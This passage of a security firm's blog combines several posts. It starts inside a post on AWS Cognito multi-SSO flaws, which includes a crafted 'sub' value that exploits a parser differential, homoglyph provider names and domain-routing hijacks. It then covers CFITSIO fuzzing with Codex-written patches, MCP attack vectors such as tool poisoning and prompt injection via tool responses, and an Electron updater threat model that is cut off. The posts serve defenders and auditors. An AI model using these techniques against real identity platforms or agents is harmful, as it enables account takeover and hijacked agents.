Provider Name	Confusable codepoints	Rendering	Notes
`LegitCorp`	none (ASCII)	LegitCorp	baseline, accepted
`LеgitCorp`	`е` = U+0435 (Cyrillic small ie)	LegitCorp	homoglyph "e", accepted on the same pool

This is dangerous because most human-facing places do not surface the difference: Hosted UI buttons, audit logs, CLI output, and grep-based audits all just render Unicode and move on. Moreover, things could get even worse in case of parser differentials caused by an application then normalizes inconsistently (lower(), NFKC, etc.), it could end up with split identities for the same IdP, or lookups resolving to the wrong record.

Sub-Level Splitting Attack

The ProviderName regex forbids _. The sub claim does not. The complete identity string can therefore contain multiple underscores:

Corp_admin_override

If component A reads split("_", 1) and component B reads split("_")[-1] (or any other positional index), the same input produces two different meanings.

Sending sub = EVIL_noise_internal@company.com from the malicious IdP would result in:

Lambda	Code	Index	Sees
`pre_signup` (uniqueness guard)	`sub.split("_")[1]`	second token	`"noise"` not in pool, passes
`jit_provisioning` (consumer)	`sub.split("_")[-1]`	last token	`"internal@company.com"`, stored as `custom:primaryEmail`

4. IdP Identifiers and Routing Hijacks

IdP identifiers are the strings Cognito uses for IdP redirection. The standard pattern is email-domain routing: a user types user@company.com, Cognito looks up company.com, and the browser is redirected to the IdP that owns that identifier.

Controlling an identifier effectively controls the initial redirection for all users of that identifier.

Hence, if a tenant drops or avoids registering an identifier, another IdP could claim it in the gap. As AWS Cognito does not ensure domain ownership, the platform itself should never allow claiming an idp-identifier without checking in advance that the tenant controls it.

It is a classic takeover of a domain with very dangerous outcomes. As an example, if gmail.com is claimable via a custom IdP configuration in a platform, you might end up redirecting every Google user to an attacker-controlled page.

Do Not Trust the IdP

Multi-SSO changes which triggers fire, what the application treats as the identity key, and how many attacker-controlled strings you accidentally parse as structure. A control placed on the wrong trigger creates ghost identities, a parser placed on attacker-controlled sub values creates privilege escalation, or a self-service IdpIdentifiers field creates a routing hijack window.

For Cloud Security Auditors

While reviewing a Cognito-backed multi-tenant platform, answer the following questions:

Does the pool register external IdPs?
For each IdP, what is in AttributeMapping? Anything in there is attacker-controlled if the IdP is malicious or compromised, regardless of WriteAttributes.
How is the PreSignUp Lambda branch on event.triggerSource? Does it cover PreSignUp_ExternalProvider and PreSignUp_AdminCreateUser, not just PreSignUp_SignUp?
Are all identity checks covered in both the trigger chains for JIT and subsequent SSO sign-in? If not, you should check for unwanted identities creation.
Does any Lambda parse event.userName or cognito:username with something like split("_") and a positional index? If yes, the parser is fragile against sub values containing _ and you should look for a guard/consumer differential.
Are IdpIdentifiers exposed in self-service IdP registration UIs? If yes, does the platform ensure that a domain id is being claimed by a tenant that confirmed its ownership? If not, arbitrary redirection of incoming users with unclaimed domains is possible.
Is AttributeMapping mapping any security-sensitive custom attributes (e.g., custom:tenantID, custom:role, custom:isAdmin)? Even with WriteAttributes locked down, JIT Lambdas using AdminUpdateUserAttributes will write them.

For Developers

Place security gates in PreSignUp, branched per triggerSource. This is the single most impactful change for multi-SSO deployments. A working pattern:

def lambda_handler(event, context):
    if event["triggerSource"] in (
        "PreSignUp_SignUp",
        "PreSignUp_ExternalProvider",
        "PreSignUp_AdminCreateUser",
    ):
        enforce_domain_policy(event["request"]["userAttributes"]["email"])
    return event

Never do split("_") event.userName to extract identity. If you must parse it, use split("_", 1) (maxsplit=1) everywhere it is parsed. The guard and the consumer must use identical extraction logic, positional indices on attacker-controlled strings are a parser differential vulnerability waiting to happen.

Keep security-relevant custom attributes out of AttributeMapping. Derive tenantID and similar fields server-side from a verified email domain inside a trigger, never read them from event.request.userAttributes after federation.

Validate email strictly in PreSignUp.

For IdpIdentifiers: never expose them as a free-form field in self-service IdP registration. In IaC, register identifiers atomically. Do not “drop then add” in the same apply.

Tool Release: maSSO, a Malicious IdP for the Job

Almost every abuse described above assumes the same primitive: an attacker-controlled IdP that a Service Provider trusts, and the ability to tamper with the exact tokens, SAML assertions, and /userinfo payloads that reach it.

Running custom IdPs just for testing purposes was time-consuming, so we decided to release the one we use during pentests: doyensec/maSSO

maSSO is a weaponized compliant Single Sign-On (SSO) Identity Provider (IdP) for security testing of OIDC and SAML 2.0 Service Providers, also supporting the SCIM protocol.

For us, it was the missing Swiss Army knife for actual SP testing. Let us know your feedback!

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/tree/main/lab-masso

Stay tuned for the next episode!

Resources

CFITSIO Fuzzing: Memory Corruptions and a Codex-Assisted Pipeline

2026-04-20T00:00:00+02:00

Have you ever wondered how those amazing space photos are taken? Are they exclusive to the big telescopes floating in space or can you take one from your backyard? What does it take to extract hydrogen colors out of a seemingly black sky?

Those are great questions, but you won’t learn it from here.

Instead, I’ll show how I set up and performed fuzzing of the CFITSIO library which is how those space photos are usually processed. I’ll show how the bugs were triaged at scale, and how Codex was used to unblock the fuzzing and to develop the initial security fixes.

Note: the work described in this blogpost used the GPT-5-Codex, which was the latest model I had access to at the time.

FITS Format

The Flexible Image Transport System (FITS) is a data standard created in the late 1970s by NASA, ESA, and the broader astronomy community. It started as a way to exchange telescope imagery across heterogeneous systems, but it evolved into a container for complex datasets: primary images, binary/ASCII tables, compressed tiles, world coordinate metadata, and instrument-specific headers. Today, most observatories, satellite missions, and even backyard observatories output FITS directly, so the ecosystem of tools is rich. Under the hood, FITS is far more than a simple image file - it routinely carries gigabyte-scale mosaics, time-series cubes, and calibration tables. The current FITS standard lives in a dense spec and most of it addresses astronomy beyond typical astrophotography - radio, infrared, X-ray, time-series, and polarization data with all their metadata are first-class in the spec, while backyard imaging uses only a small slice. Once telescopes and CCD cameras got cheap enough for hobbyists, the community needed tooling that already worked, so adopting FITS was the obvious shortcut. The format was battle-tested and carried all the metadata serious imaging needed. Ultimately, hobbyists inherited a rather complex data format that rarely changes because backward compatibility with old files is still mandatory.

There are several different libraries that claim to support the FITS format. Usually though, that only means some subset of the spec. CFITSIO is the most complete implementation and the library is used by numerous great pieces of astronomy software, therefore it piqued my interest.

For my fuzzing corpus, I’ve used some of my own astrophotos along with several public samples. I’m sure the coverage could be vastly improved with the right set of specialized data.

First Round: Generic Fuzzing

Initially, I began fuzzing using the standard AFL++ workflow. Harness code, testing corpus, some optimizations, with several sessions running over two weeks. This resulted in a security advisory consisting of six different bugs.

It was a quick experiment to see how fruitful the fuzzing could be and how the communication with the NASA team works. Fortunately, the cooperation was great and issues were quickly addressed by the HEASARC team.

Second Round: EFS

Having the setup ready to go, I decided to give it another shot. Testing was performed against cfitsio-4.6.3 which included fixes to previously reported issues. This time, I focused exclusively on the Extended Filename Syntax (EFS) which got my interest earlier. It’s a set of filters, enclosed in square brackets, that can be used to modify the raw file in various ways before it is opened and read by the application. Although EFS looks like a filename parser on the surface, it’s effectively a mini-language: image slicing, histogram generation, filters, pixel expressions, region filtering, arithmetic expressions, and the entire parser stack behind them.

An example FITS filename can look like this: myfile.fits[EVENTS][col Rad = sqrt(X**2 + Y**2)]

This opens a FITS file, selects the EVENTS extension, and creates a new column computed from existing data. The library does all of that before the application sees a single byte. The filename alone triggers extension lookup, column arithmetic, and a temporary file copy. Each bracket pair activates a different parser subsystem inside CFITSIO.

This represents a very interesting attack surface and it’s exposed in more places than people might think. Many applications accept filenames directly from external callers without realizing that CFITSIO will interpret them through EFS if only the fits_open_file or similar method is called (a non-EFS alternative: fits_open_diskfile also exists). If those filenames come from untrusted input, the attack path is open.

This time, as I didn’t have too much dedicated time, I’ve strongly relied on help from the GPT/Codex. First, it generated the harness code and some helpful cleanup utilities. The harness itself is minimal: it reads a filename string from a file, passes it to fits_open_file in read-only mode, then exits. That’s enough to exercise the entire EFS parsing and evaluation pipeline (or most of it, as I learned later), without needing complex application logic.

Early fuzzing cycles not only resulted in a lot of crashes, but also unexpected files created all over the filesystem and with the input FITS file being repeatedly destroyed. This wasn’t hard to fix though. I then asked GPT to look at the spec and the code and create a dictionary tailored to EFS tokens.

Within hours I had some clean crashes. This was nothing surprising given how much logic CFITSIO runs before it ever opens a file. Some days later, I ran AFLtriage and observed that there are just three different bugs responsible for all crashes I was seeing. The fuzzer couldn’t move on any further and coverage also barely moved. Even relatively simple code paths were unreachable with random mutations constantly hitting the same shallow error paths.

To keep going, I had to automate more of the workflow. That’s when I brought in Codex again.

Workflow Improvements

I loaded the CFITSIO/harness sources into Codex and fed it the crash reports along with the input files. Within seconds, it identified the root cause of each issue. It also gave me correct functions, correct offsets, correct control flow, and assumptions that failed. It pointed to actual logic errors, such as operator-precedence mistakes, unchecked token lengths or unbounded concatenations. I was surprised how fast and accurate the analysis was.

The next step involved asking for the patch and applying it. This completely unblocked my fuzzing. I restarted the process using the old output directory with a new harness build and… left it running.

Two weeks later, I had to stop the fuzzing and started investigating. AFLtriage again was very useful to quickly identify unique crashes. Learning from past experience, I went with Codex as my assistant again. After a few manual experiments I automated the following pipeline:

providing crash context and source code to Codex,
applying the proposed patch with a proper commit message,
rebuilding CFITSIO (with AFL++ and ASAN instrumentation included),
linking my fits-opener harness,
re-running the crashing input under ASAN,
confirming the fix and absence of regressions (including memory leaks).

Some fixes required multiple iterations. A patch that fixed an overflow might introduce a memory leak or leave an error path inconsistent. The automated loop caught those kinds of bugs. With just one verification test, it’s extremely likely that some functional issues were introduced. On the other hand, I skimmed the patches and they looked really solid, so… maybe not?

I repeated this process from scratch several times and ended up with 16 unique vulnerabilities, each pretty well understood, reproduced, and isolated.

Most of the bugs were from the old-school C string handling meets attacker-controlled input category. Some mismatched size checks on strncat, some stale realloc pointers, and some integer overflows in array math. This led to overflows on the stack and heap.

I did not attempt to weaponize any of the findings. CFITSIO might be used on so many platforms that some of them definitely miss even the most basic security mitigations. On the other hand, a quick inspection of stack overflows led me to believe that function frames are enormous and reaching control over RIP, or any function pointer, might be really challenging.

Example finding

Here is a brief overview of one of the findings (CFITSIO-EFS-01). It’s a typical syntax trap that most people will overlook but fuzzing should easily find.

In the Extended Filename Syntax, row filter expressions are encoded inside square brackets, like file.fits[2:f[R:f...]. The function ffifile2 accumulates them into a stack buffer called rowfilterx. Before each concatenation, it checks whether the new chunk would overflow the buffer:

if (strlen(rowfilterx) + (ptr2-ptr1 + (*rowfilterx)?4:0) > FLEN_FILENAME - 1) {
    free(infile);
    return(*status = URL_PARSE_ERROR);
}

Looks reasonable at a glance. There’s even a comment above it: “add extra 4 characters if we have pre-existing expression”. The intent is clear: if rowfilterx already holds something, the code wraps the new piece with ((...)), so it needs 4 extra bytes.

The problem is C operator precedence. The ternary ?: has lower precedence than +, so the expression actually evaluates as:

(strlen(rowfilterx) + (ptr2-ptr1 + (*rowfilterx)) ? 4 : 0) > FLEN_FILENAME - 1

That whole left side of ? is always non-zero (it’s a positive length sum), so the result is always 4 > FLEN_FILENAME - 1, which is always false. The if statement is never entered. Crafted filenames bypass it and strncat writes past rowfilterx, corrupting adjacent stack data.

The fix is just parentheses:

if (strlen(rowfilterx) + (ptr2 - ptr1 - 1) + ((*rowfilterx) ? 4 : 0) > FLEN_FILENAME - 1) {

This is the kind of bug where the developer clearly knew what they were protecting against. Yet, they got busted. It’s also a perfect example of what makes the Codex-assisted debugging effective. I handed it the crashing input, the ASAN trace, and the source file. Given those, it pinpointed the precedence issue right away.

Advisory

On November 17, 2025, the complete package — advisory, patches, crash files, and reproduction steps - was sent to the HEASARC/NASA maintainers. All code patches were Codex-generated. Since I don’t have access to a sufficient representation of real-world FITS files, I couldn’t validate functional regressions myself outside of a couple of test cases.

Once the security fixes landed in the repository, the team confirmed that the patches were very useful and even in the cases where ultimate fixes differed from the provided patches, they were still helpful to illustrate the problem. Some of them were applied without any changes.

The full advisory can be found here.

Closing Thoughts

Combining AFL++ with automated static guidance and automated fix validation proved to be very effective on a complex, legacy-heavy codebase and saved me a ton of time. I’m also happy that the HEASARC/NASA maintainers found the patches useful.

For the time being, I do not intend to continue CFITSIO fuzzing. Sadly, I believe there are still numerous memory issues lurking in old codebases like this. I hope that emerging security-oriented LLMs will be especially useful for identifying and fixing issues in projects appearing to the community as less interesting than the next major browser or CMS.

The story is not over yet though. Besides the memory issues presented in this post, separate logical bugs in EFS were discovered and will be soon disclosed. Stay tuned!

In other news, I will be presenting more about NASA’s CFITSIO Extended Filename Syntax at BSidesLuxembourg 2026. See you there!

The MCP AuthN/Z Nightmare

2026-03-05T00:00:00+01:00

This article shares our perspective on the current state of authentication and authorization in enterprise-ready, remote MCP server deployments.

Before diving into that discussion, we’ll first outline the most common attack vectors. Understanding these threats is essential to properly frame the security challenges that follow. If you’re already familiar with them, feel free to skip to the section “Enterprise Authentication and Authorization: a Work in Progress” below.

Huge shoutout to Teleport for sponsoring this research. Thanks to their support, we have been able to conduct cutting-edge security research on this topic. Stay tuned for upcoming MCP security updates!

At this stage, introducing the Model Context Protocol (MCP) would be redundant since it has already been thoroughly covered in the recent surge of security blog posts.

For anyone who may have missed the conversation, here’s a brief recap:

MCP is a protocol used to connect AI models to: data, tools and prompts. It uses JSON-RPC messages for communication. It’s a stateful connection where clients and servers negotiate capabilities.

A high-level architecture is provided below:

References: MCP Specification and MCP Architecture

MCP Attack Vectors

Several categories of vulnerabilities pertaining to MCP emerged in the wild. While it might not fit every bug you read about, as things are changing on a daily basis, a good starting point is the good and not-so-old OWASP MCP Top 10.

Below are the most relevant vulnerabilities we have encountered so far, organized by the malicious actor profile:

Malicious MCP Server

Rogue MCP servers could intentionally exploit clients with:

Tool Poisoning: The server provides malicious tool definitions or modifies them after user approval. Sub-categories and variations of the attack:
- Rug Pulls: A server presents benign capabilities during initial tools/list call, then switches to malicious ones during execution or in subsequent MCP messages
- Tool Shadowing: A malicious server injects tool descriptions that modify the agent’s behavior with respect to a trusted tool
- Schema Poisoning: Corrupting interface definitions to mislead the model. The schema is used by MCP clients to validate the tool inputs and outputs and to let the model know what is required to interrogate them
Prompt Injection via Tool Responses: The server returns malicious instructions embedded in MCP responses to normal actions, which the client’s LLM then executes
Data Exfiltration via Resources: Malicious servers exposing resources that leak sensitive client information etc.

It should be highlighted that the the listed attacks are exploitable by either local or remote MCP servers. Of course, the outcome varies drastrically in terms of achievable impacts.

Malicious MCP Client

Rogue MCP clients could intentionally exploit servers with:

Command Injection: Crafted MCP Message inputs sent to vulnerable MCP servers that do not properly sanitize - allowing arbitrary command execution (mostly in a old-fashioned way)
- Examples: CVE-2025-53100 (RestDB’s Codehooks.io MCP Server), CVE-2025-53818 (GitHub Kanban MCP Server)
Context Injection & Over-Sharing: Servers that do not properly isolate context, allowing exfiltration of sensitive information from other users/sessions
Prompt Injection: The MCP Server could receive malicious prompts from the client, which would then modify its behavior to execute the requested tasks

Other Malicious Actors

Beyond the traditional client-server factors, an MCP ecosystem could also be compromised by:

MCP Proxies/Gateways: Intermediary systems (like MCP proxies) used for routing and authorization of MCP. These could alter passing MCP messages or simply be vulnerable to policy bypasses. You might be surprised by the number of MCP Gateways out there
Single-Sign-On (SSO) Intermediaries: MCP servers using OAuth 2.0/2.1 for authorization rely on discovery endpoints (.well-known/oauth-authorization-server) and dynamic client registration. Malicious actors could exploit these intermediaries by injecting fake metadata, manipulating redirect URIs, or compromising the registration endpoint to obtain unauthorized client credentials (e.g., CVE-2025-4144 - a PKCE bypass in workers-oauth-provider, CVE-2025-4143 - improper redirect_uri validation)

The Nightmare: New Actors, New Problems to Solve

Securing SSO remains an open challenge for the industry due to its intrinsic complexity. The past few years have highlighted this reality, with a steady stream of severe vulnerabilities affecting OAuth2, OIDC, SAML and SCIM implementations.

Yet, progress never stops and authentication & authorization in MCP are the new inevitable nightmare. Being a relatively new protocol, the standards for how clients and servers should establish trust are still evolving, leading to a fragmented ecosystem.

The specifications for AuthN/AuthZ are subject to continuous changes and extensions, as is common for newborn protocols. This instability means that today’s “secure and compliant” implementation might be deprecated or insufficiently secure tomorrow.

Just few of the latest Specification Enhancement Proposals (SEPs) in MCP

Multiple significant issues have been emerging in the MCP SSO implementation, many as descendants of the common OAuth2/OIDC vulnerabilities, but also new ones.

We have seen browser-based clients or open() URL handlers exploited to launch arbitrary processes or redirect to malicious servers, showing the fragility of the MCP client-side implementation, often linked to automatic action executors.

Then, attacks against the new metadata discovery and old-school metadata endpoints:

Protected Resource Metadata (PRM) documents injected with malicious URI schemes
OIDC Discovery endpoints manipulated to redirect flows

Notable mentions around the cited scenarios are: CVE-2025-6514, “From MCP to Shell”, CVE-2025-4144, CVE-2025-4143, CVE-2025-58062

Furthermore, many implementations (like IDE extensions and CVE-2025-49596) assumed localhost was secure, starting WebSocket servers without auth, allowing any local process (or malicious website via DNS rebinding) to connect.

While keeping up with the latest news is pretty complex, time consuming and not always possible, we attempted to sum-up the potential injection points affecting the current MCP Authentication via OAuth2 and dynamic client registration.

A Scary Sequence Diagram

The monolith sequence diagram below embodies the title of this post. It should serve as a reminder of how extensive the attack surface is and how many injection points exist. One could argue that “every step is an injection point” and that would not be inaccurate. However, the goal here is to illustrate the full length of the authorization flow, from start to finish, highlighting the many branches, variations, and opportunities for subtle yet impactful vulnerabilities.

The high-resolution PDF file can be downloaded here.

While prompt injection requires a different approach, most of the injection points and impactful outcomes, such as LFI, RCE, etc. could be prevented by strictly applying sanitization and validation of the inputs. Still, the monolith highlights how complex it is to do so, given the length and variety of actors throughout the entire flow.

Enterprise Authentication and Authorization: a Work in Progress

In the OAuth specification, there is scope consent by the user at the time of authorization.

The user HAS to see and approve the exact scopes for each third-party tool/app/etc. before any token is issued by the IdP.

Currently, there is no homogeneous way to manage MCP security across an enterprise. While individual MCP tools struggle with authentication and often just rely on secret tokens, the Enterprise-level authN/Z is a whole other challenge.

In fact, in enterprise-managed authorization the scope consent is decoupled from the time of authorization.

As an example, an MCP client with enterprise authorization could be accessing Slack and GitHub on behalf of the user, but the user never explicitly consented to github:read slack:write in a consent screen. The local agent decided the task and the scopes required, and the enterprise policy enforcement decided to allow it on behalf of the user based off their MCP Client identity.

Down that path, there is intermediary tooling trying to offer a partial solution such as MCP Proxies/Gateways. While they are extremely useful at aggregating MCP severs under the same centrally-managed authentication and authorization layer, they are still not solving the problem rising with dynamic scopes and plug-and-play third-party tools/apps.

On the other side, there are active discussions around a native Enterprise-Managed Authorization Extension for the Model Context Protocol. During our research on the matter, we had the possibility to do a deep dive into a current draft of the extension, which relies on the Identity Assertion JWT Authorization Grant (JAG). Given our exposure to real-life security engineering challenges faced by our clients, we decided to take a step further and offer our feedback on the draft. We strongly suggest reading the Extension Draft and Doyensec’s pull-request with the updated Security Considerations.

The JAG Problem (Identity Assertion JWT Authorization Grant)

The following summarizes the JAG approach and our considerations. For readers interested in understanding all the aspects in great depth, we would recommend reading the full draft before continuing.

The main idea of this specification revolves around leveraging existing Enterprise Identity Providers (IdPs), such as Okta or Azure AD.

The flow’s key-points are:

The current specification introduces a few outstanding challenges:

1. Access Invalidation Problem

There are three level of tokens issued throughout a correct execution of the flow:

ID Token from IdP
ID Token For the Grant (JAG ID) from IdP
MCP Access Token from the MCP Authorization Server

The proposed specification does not explicitly describe mechanisms for invalidating access to an MCP client or revoking issued tokens / ID-JAG.

MCP-Specific Note: While the access invalidation is also unspecified in the parent RFCs, the high risk associated with non-deterministic agentic accesses to tools and resources should require an access invalidation flow for the Enterprise context. Otherwise, the enterprise processes being authorized with the above mentioned spec would not have a clear emergency recovery pattern whenever agents start misbehaving (e.g., injections and other widely known attacks). Consequently, every actor could end-up proposing its own recovery pattern, bringing ambiguity and implementation differences.

2. LLM Scope Abuse Without User Consent

In JAG, the IdP issues an ID Token with no scopes embedded. It just states the identity of the user to allow impersonation from the MCP client. When the MCP client requests a JAG for high-risk scopes like github:write slack:write, no consent pop-up is triggered. The enterprise policy decides on behalf of the user being impersonated.

MCP-Specific Note: While this is totally normal in a classic Machine-to-Machine (M2M) environemnt where the enterprise users are expected to be directly mandating specific tasks on their behalf to automation software, that standard does not apply to the MCP field.

The tasks and actions list being transformed into MCP interactions are not directly chosen deterministically from the end-user.

In general, the consent requirement bypass offered by JAG would allow LLMs to autonomously request any scope permitted by enterprise policies, even if it’s irrelevant to the user’s current task, removing the human-in-the-loop for high-risk actions.

3. How the IdP Creates, Distributes and Validates Clients

Within the JAG proposal, it is not declared how the IdP should issue/distribute client credentials (secret vs. private-key JWT vs. mTLS, how they’re delivered, rotation, etc.).

Moreover, it is not declared how important it is for the IdP to ensure that the audience (The Issuer URL of the MCP server’s authorization server) is linked to the resource (The RFC9728 Resource Identifier of the MCP server).

MCP-Specific Note: While such a practice is unspecified in the parent specifications, enterprise architectures are usually based on multiple IdPs managing access to a wide range of resources, often overlapping: e.g., both IdP A and IdP B can authorize access to app C. Within the presented Enterprise MCP scenario, multiple IdPs could be authorizing multiple MCP Authorization Servers (often overlapping), while each of them manages scopes for a range of MCP Servers.

In such context, clearly defining namespaces and required checks on IdPs and MCP Authorization Servers would help preventing implementation issues like:

Scope Namespace Collision: If Server A and Server B both use common scope names like files:read, admin:write, etc., the attacker could leverage a low-privilege ID-JAG from Server B to gain access to Server A if aud is not checked to be the Authorization Server and the resource as one of the MCP Servers managed by the specific MCP Authorization Server

Resource Identifier Injection: If the MCP Server Authorization Server doesn’t validate that the resource claim in the ID-JAG matches its own registered resource identifier, it cannot distinguish between ID-JAGs intended for different servers. Once obtained an MCP session, the injected value could be lost and irrelevant, allowing cross-access.

The IdP must ensure that JAGs for resources not managed by the caller client are not forged.

4. ID-JAG Replay Concern

Whenever a single ID-JAG can mint multiple MCP Server access tokens, and those access tokens can invoke high-impact tools, then the ID-JAG becomes an amplifier of damage. That is why the decision of enforcing single-use checks on the jti should belong within the specification.

Conclusion

Authentication and authorization, especially in the context of SSO and transitive trust across third parties, have historically been a breeding ground for subtle, high-impact vulnerabilities. MCP does not change this reality. If anything, by introducing additional layers of indirection, remote server pooling, and agent-driven workflows, it amplifies the existing complexity. In the near term, we should expect AuthN/Z in MCP deployments to remain a challenging and error-prone domain.

For this reason, both auditors and developers should apply the strictest possible validation at every step of any SSO flow involving MCP. Token issuance, audience binding, scope enforcement, session propagation, identity mapping, trust establishment, and revocation logic all deserve explicit scrutiny. The end-to-end sequence diagram presented in this article is intended as a practical starting point: a tool to reason about the full authorization chain, enumerate trust boundaries, and systematically derive a security test plan. Every transition in that flow should be treated as a potential injection point or trust confusion opportunity.

When it comes to enterprise-managed authorization models, approaches such as JAG raise significant concerns. They introduce complex cross-specification dependencies, expand the number of actors involved in trust decisions, and substantially widen the attack surface. More critically, the model’s reliance on full user impersonation by non-deterministic agents, capable of autonomously selecting and executing tasks without explicit per-action user consent, is misaligned with MCP’s security requirements. Delegation without tight contextual constraints is indistinguishable from privilege escalation when boundaries are not rigorously enforced.

Based on our experience, a more robust direction for enterprise MCP deployments would emphasize strong, explicit trust anchors and protocol minimization. Technologies such as certificate-based authorization and mTLS, adapted specifically to MCP’s interaction model, provide clearer security properties and reduce ambiguity in identity binding. These mechanisms should be complemented by:

Explicit protections for high-risk or irreversible actions
Uniform and centralized access invalidation mechanisms for incident response and disaster recovery
Strict resource namespacing and deterministic scope mapping
Clear separation between user delegation and agent execution contexts

In short, the goal should not be to replicate the full complexity of traditional enterprise SSO stacks inside MCP, but to reduce implicit trust, constrain delegation semantics, and make authorization decisions auditable and deterministic.

If the industry has learned anything from the past decade of OAuth, OIDC, SAML, and SCIM vulnerabilities, it is that complexity without strong invariants inevitably leads to security gaps. MCP deployments would do well to internalize that lesson early.

Building a Secure Electron Auto-Updater

2026-02-16T00:00:00+01:00

Introduction

In cooperation with the Polytechnic University of Valencia and Doyensec, I spent over six months during my internship in a research that combines theoretical foundations in code signing and secure update designs with a practical implementation of these learnings.

This motivated the development of SafeUpdater, a macOS updater vaguely based on the update mechanisms used by Signal Desktop, but otherwise designed as a modular extension.

SafeUpdater is a package designed for MacOS systems, but its interfaces are easily extensible to both Windows and Linux.

Please note that “SafeUpdater” is not intended to be used as a general-purpose package, but as a reference design illustrating how update mechanisms can be built around explicit threat models and concrete attack mitigations.

⚠️ This software is provided as-is, is not intended for production use, and has not undergone extensive testing.

The State of Electron Auto-Updates

A software update is the process by which improvements, bug fixes, or changes in functionality are incorporated into an existing application. This process is crucial for maintaining the security of the app, improving performance, and ensuring compatibility with different systems. Because updates are central to both the maintenance and evolution of software, the update mechanism itself becomes one of the most sensitive points from a security perspective.

In Electron applications, an updater typically runs with full user privileges, downloading executable code from the Internet, and may install it with little or no user interaction. If this mechanism is compromised, the result is effectively a remote code execution channel.

Being one of the most widely used application frameworks for desktop apps, Electron also represents one of the most attractive targets for attackers. While the official framework update mechanism provides a ready-to-use solution for most applications, it doesn’t protect against certain classes of attacks.

Currently, there are two main solutions for implementing an auto-update system in ElectronJS:

autoUpdater

The first is the built-in auto-updater module provided by Electron itself. This module handles the basic workflow of checking if there are updates available, downloading the update, and applying it, using standard HTTP(S) and relying on code signing and framework-specific metadata for file integrity.

One of the simplest ways to use it is with update-electron-app, a Node.js drop-in solution that is based on Electron’s standard autoUpdater method without changing its underlying security assumptions. The following code snippet shows an example of its implementation:

const { updateElectronApp, UpdateSourceType } = require('update-electron-app')
updateElectronApp({
  updateSource: {
    type: UpdateSourceType.StaticStorage,
    baseUrl: `https://my-bucket.s3.amazonaws.com/my-app-updates/${process.platform}/${process.arch}`
  }
})

This module builds on top of Electron’s autoUpdater, providing a higher-level interface:

  autoUpdater.setFeedURL({
    url: feedURL,
    headers: requestHeaders,
    serverType,
  });

electron-updater

The second solution is using Electron-Builder’s electron-updater library, which offers a more integrated approach for managing application updates. When the application is built, a release file named latest.yml is generated, containing metadata about the latest version. These files are then uploaded to the configured distribution target.

The developer is responsible for integrating the updater into the application lifecycle and configuring the update workflow.

Differences between “autoUpdater” and “electron-updater”

Feature	Electron Official (`autoUpdater`)	Electron-Builder (`electron-updater`)
Publication server requirement	Requires self-hosted update endpoints	Uses built-in providers (e.g. GitHub Releases)
Code signature validation	macOS only	macOS and Windows (custom and OS validation)
Metadata and artifact management	Manual upload of metadata and artifacts required	Automatically generates and uploads release metadata and artifacts
Staged rollouts	Not natively supported	Natively supported
Supported providers	Custom HTTP(S) only	Multiple providers (GitHub Releases, Amazon S3, and generic HTTP servers)
Configuration complexity	Higher, especially with a custom server	Minimal configuration
Cross-platform compatibility	Platform-specific tools (Squirrel.Mac, Squirrel.Windows)	Unified cross-platform support (Windows, macOS, Linux)

Now that we have a clear picture of the software update mechanisms available in ElectronJS today, we can shift our focus to two specific threats that are not mitigated by any of the existing open-source solutions. It is worth noting that most of the considerations discussed here are not specific to ElectronJS itself, but apply more broadly to software updaters for desktop applications in general.

At the core of these issues lies a fundamental limitation of modern operating systems: the lack of a reliable, built-in mechanism to fully validate the integrity of the software currently running on the system. While macOS, thanks to its relatively closed ecosystem, does provide native capabilities such as code signing and notarization to help verify software integrity at runtime, this is not the case on Windows. As a result, Windows applications cannot rely on the operating system alone to assert that the updater or the application binary has not been tampered with.

Because of this gap, software updaters must implement additional safeguards and workarounds to compensate for the missing integrity guarantees. These compensating controls are often complex, error-prone, and inconsistently applied across projects, which ultimately leaves room for entire classes of attacks that remain unaddressed even in the most popular desktop applications.

The Missing Threats

In all software updater implementations, the following assets are considered critical and must be protected:

Update Binary: The new version of the application to be installed
Update Manifest: Contains metadata such as version number, hashes, and file locations
Signing Keys: Cryptographic keys used to sign update binaries and manifests
Distribution Channel: The method used to deliver updates to the client (e.g., a dedicated update server, an S3 bucket, or a CDN).

In this post, we focus only on the threats that are not mitigated by the default ElectronJS software update mechanisms. In fact, given the absence or limited capabilities around software integrity checks at the OS level, the following threats remain unaddressed:

Attacks Summary

Threat	Attack Vector	Threat Actor	Potential Impact
Downgrade (Rollback) Attack	Manipulation of update manifest or version metadata to serve older releases	Malicious third party, MITM (Man-in-The-Middle), compromised server	Reintroduction of known vulnerabilities
Integrity Attack	Tampering with update binaries, installers, or metadata	MITM (Man-in-The-Middle), compromised CDN, update server, or build pipeline	Arbitrary code execution
Race Condition Attack	Replacing verified update files between verification and installation	Local attacker with system access	Execution of malicious code, privilege escalation
Untested Version Attack	Serving signed but non-production (alpha/beta/dev) builds via update channel	Malicious third party, MITM (Man-in-The-Middle), insider threat	Exposure to unreviewed features, debug functionality, or new vulnerabilities

1- Downgrade (Rollback) Attack

A downgrade attack occurs when an attacker forces the application to install an older, vulnerable version instead of the latest secure release. This may happen by compromising the update server, or intercepting via a MITM (Man-in-The-Middle) attack and modifying the update manifest to offer a lower version.

The attacker’s objective is to reintroduce previously fixed vulnerabilities by deploying an outdated version of the application. Once installed, the attacker can exploit these known weaknesses.

Attack Steps:

The attacker manipulates the update mechanism to force the application to download and install an older, vulnerable version (Downgrade Attack).
A version is selected where known security flaws remain unpatched.
After installation, the attacker exploits a known vulnerability to compromise the system.

2- Integrity Attack

An integrity attack involves the unauthorized modification of update artifacts, such as binaries, installation packages, or metadata, either at rest or during transmission. The attacker’s goal is to have the system execute altered code while believing it originates from a trusted source.

Attack Steps:

The attacker modifies the update package or metadata through a compromised distribution channel (e.g., CDN, update server, or build pipeline), or via a MITM attack in the absence of proper transport security.
The client downloads the modified update, assuming it is legitimate.
The altered package is installed and executed.
The attacker gains arbitrary code execution.

3- Race Condition Attack

A race condition attack occurs when multiple processes access and modify shared resources concurrently, and the final outcome depends on the timing of those operations. In the context of software updates, this may allow an attacker with local access to replace or modify update files between verification and installation.

This attack requires the attacker to have access to the victim’s machine. While this may appear unlikely, multi-user systems or shared environments make this a realistic threat.

A practical case occurs when the attacker has access to the temporary directory where the update files are stored. This attack is possible whenever signature verification and update application are not performed atomically on the same file descriptor.

Attack Steps:

The application downloads the update to a temporary directory.
The update’s signature and hash are verified.
Before installation, the attacker replaces the verified file with a malicious one.
The application attempts to apply the modified update.

4- Untested Version Attack

